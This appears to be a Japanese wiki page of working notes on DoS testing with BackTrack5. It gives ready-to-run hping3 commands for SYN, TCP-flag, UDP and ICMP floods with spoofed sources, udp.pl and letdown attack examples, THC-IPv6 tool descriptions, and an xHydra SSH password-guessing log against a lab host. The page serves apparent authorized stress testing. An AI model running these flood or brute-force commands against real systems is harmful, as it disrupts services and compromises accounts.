DoS検査 の変更点

Last-modified:

DoS検査について、方法をまとめます。
BackTrack5の使用を前提としています。

&color(#ff0000){''※(他のページも同様ですが)本ページの内容は無保証です。''};

※常に書きかけ項目

* ツールの場所 [#wb32a63f]

Applications>BackTrack>Stress Testing>Network Stress Testing

** ツール一覧 [#ha81bc11]

// #ref(Network Stress Testing.png)

テキストで列挙。

- denial6
- dos-new-ip6
- flood_advertise6
- flood_router6
- hping2
- hping3
- letdown
- rsmurf6
- sendpees6
- siege
- smurf6
- udp.pl

6って何だろう。IPv6対応?


* TCP関連 [#wde67cf5]

** SYN Flood [#ub380e29]

まずはhping3での実施方法。

【実際のコマンド】

 hping3 -i u1000 -c 4 -S -p 443 xxx.xxx.xxx.xxx

*** 参考情報 [#wf0da005]
Example of a SYN flood attack using hping3 : 
 hping3 -q -n -a 10.0.0.1  -S  -s 53 --keep -p 22 --flood 192.168.0.2  


** TCP Connection Flood [#f557056c]

まずはhping3での実施方法。

*** 説明(引用) [#y049b904]

There are lots of possibilities of flooding using TCP. Just set the various TCP flags as you whish. Some TCP flooding techniques consist in setting a lot of unusual flags to perturb week O.S.

*** 参考情報 [#i76491d9]

Example with the SARFU scan :
 hping3 -q -n -a 10.0.0.1  -SARFU -p 22 --flood 192.168.0.2  


【実際のコマンド】
 hping3 -q -n -a 10.0.0.1 -SARFU -p 80 -i u1000 xxx.xxx.xxx.xxx



* UDP関連 [#p4c15f1d]

** UDP Flood [#j23d3939]

まずはhping3での実施方法。
udp.plでも実施してみた。

*** hping3で実施 [#e7be2033]

It is the same concept as in ICMP flood except that you send a huge amount of UDP data. UDP flood can be very dangerous for the network bandwidth.
Generating UDP flood with hping3 is easy : 
 hping3 -q -n -a 10.0.0.1  --udp  -s 53 --keep -p 68 --flood 192.168.0.2 

【実際のコマンド】

 hping3 -i u1000 -c 4 -2 -p 53 xxx.xxx.xxx.xxx

*** udp.plで実施 [#m26ab98f]

動作することは確認。
手元ではなかなか、落ちるまでいかないので、一定時間実施して、落ちる or レスポンス低下を確認する。

【コマンド】
 root@bt:/pentest/misc/udp-pl# perl ./udp.pl 192.168.80.132 53 1

【結果】
 udp flood - odix
 udp: no process found
 
確認はhping3で。

 root@bt:/pentest/misc/udp-pl# hping3 -p 53 -c 4 -2 192.168.80.132
 HPING 192.168.80.132 (eth2 192.168.80.132): udp mode set, 28 headers + 0 data bytes
 
 hping -i u1 -S -p 80 dst-host-or-ip
 


* ICMP関連 [#h0f4d2d4]

NW機器など、応答しないものについては実施しなくてよい。

** ICMP flood [#z8ee5526]

ICMP flooding consists to send a maximum ICMP data to a machine in the minimum amount of time, for example pings. In the "old" times it was possible to corrupt a machine using a single huge ping (the ping of death), hopefully these times are over, but it is still possible to attack the bandwidth and process time of any machine who accept ICMP packets.

Example of an ICMP flood using hping 3 :

 hping3 -q -n -a 10.0.0.1 --id 0  --icmp -d 56   --flood 192.168.0.2
 hping3 -q -n -a 10.0.0.1 --id 0  --icmp -d 56 --flood 192.168.0.2

The -q option means quiet, the -n means no name resolving, ?id 0 if for ICMP echo request (ping), -d is size of the packet (56 is the normal size for a ping).



* その他 [#z452a82b]

** hping3 --flood オプション [#a4975473]

その他、「--flood」オプションで、可能な限り早くSYNパケットを送信可能
「--flood」オプションで、可能な限り早くSYNパケットを送信可能

※ログが出力されないので、テストの際は代替オプションとして「-i u1000」(1000micro sec間隔で送信)などを使用することが望ましい。


【実際のコマンド】
root@bt:/pentest/stressing/letdown# hping3 -p 80 -V --flood -c 4 -S 192.168.80.132
using eth2, addr: 192.168.80.131, MTU: 1500
HPING 192.168.80.132 (eth2 192.168.80.132): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.80.132 hping statistic ---
1331517 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms


** HTTP [#d8afbff8]

記載予定



* 参考URL [#p99cdb66]

** DoS [#qed64210]
 
http://www.hackingtricks.in/search/label/DoS%20attack

iptablesとhping3を使ったDoS検査 
http://www.sevagas.com/?Iptables-firewall-versus-nmap-and,32
UDP, TCP, SYN Floodコマンド記載 


** SYN Flood [#c3a2bc50]

http://mediakey.dk/~cc/hackerguide-syn-flood-attack/

http://www39.atwiki.jp/vippre/pages/13.html

http://www.packetlevel.ch/html/hping.html

** ツール関連 [#o0eb015d]

LetDown利用
http://bogus.jp/wp/?p=809

各ツールの概説
http://www.n0where.net/2010/12/thc-ipv6.html
 



* 以降、落書き置き場 [#b37120ee]

denial6
 
root@bt:~# denial6 
denial6 v1.4 (c) 2010 by van Hauser / THC <vh@thc.org> www.thc.org

Syntax: denial6 [-r] interface destination test-case-number

Performs various denial of service attacks on a target
If a system is vulnerable, it can crash or be under heavy load, so be careful!
If not test-case-number is supplied, the list of shown.
Use -r to use raw mode.
 
 
・denial6
なぜかエラー
root@bt:~# denial6 eth1 127.0.0.1 1
セグメンテーション違反です
 
dos-new-ip6
IPv6なのでとりあえず今回は関係なし

flood_advertise6
何だろう。
「 flood a target with random neighbor advertisements」
 
flood_router6
何だろう。
「flood a target with random router advertisements」

hping2
hping3
 
letdown
どうもうまく動かない。
root@bt:/pentest/stressing/letdown# ./letdown -d 192.168.80.132 -p 80 -S 00:0c:29:9e:5d:ca -D 00:0c:29:9e:5d:ca -v 2 -P payloads/http.txt 
LetDown start: Thu Aug  4 00:53:51 2011
pcap_initialize() failed: Retrieving the source IP address failed: provide it with the options.
 

【参考】

http://bogus.jp/wp/?p=809
 
http://www.sevagas.com/?Iptables-firewall-versus-nmap-and,32
UDP, TCP, SYN Floodコマンド記載 


2) Exaples:

Generic attack:

 # letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 21

Attack against a webserver using payload and firewall options:

 # letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -f iptables -P payloads/http.txt

Connections from 3 ports < 1024 and with the time option:

 # letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -x 80 -y 100 -t 10000

More info: http://complemento.sourceforge.net/
 

rsmurf6

Linuxのみ?
「remote smurfer, known to work only against linux at the moment」
 
sendpees6

「a tool by willdamn(ad)gmail.com, which generates a neighbor solicitation requests with a lot of CGAs (crypto stuff ;-) to keep the CPU busy. nice.」
 
siege

smurf6

ひとまず今回は関係なし。
「local smurfer」
 
 
URL
http://www.n0where.net/2010/12/thc-ipv6.html
 
xHydra
 
Timeoutは100ms程度に設定する。
Timeoutが短すぎる(デフォルト30ms)と、レスポンスよりも前にタイムアウトし、
延々と同じID/PWでリトライしてしまう。
 
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-07-31 23:03:00
[DATA] 1 tasks, 1 servers, 8 login tries (l:1/p:8), ~8 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "root" - child 0 - 1 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "admin" - child 0 - 2 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "hello" - child 0 - 3 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "test" - child 0 - 4 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "sasasasa" - child 0 - 5 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "password" - child 0 - 6 of 8
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "test00" - child 0 - 7 of 8
[STATUS] attack finished for 192.168.32.133 (waiting for children to finish)
[ATTEMPT] target 192.168.32.133 - login "admin" - pass "" - child 0 - 8 of 8
Hydra (http://www.thc.org/thc-hydra) finished at 2011-07-31 23:03:27
<finished>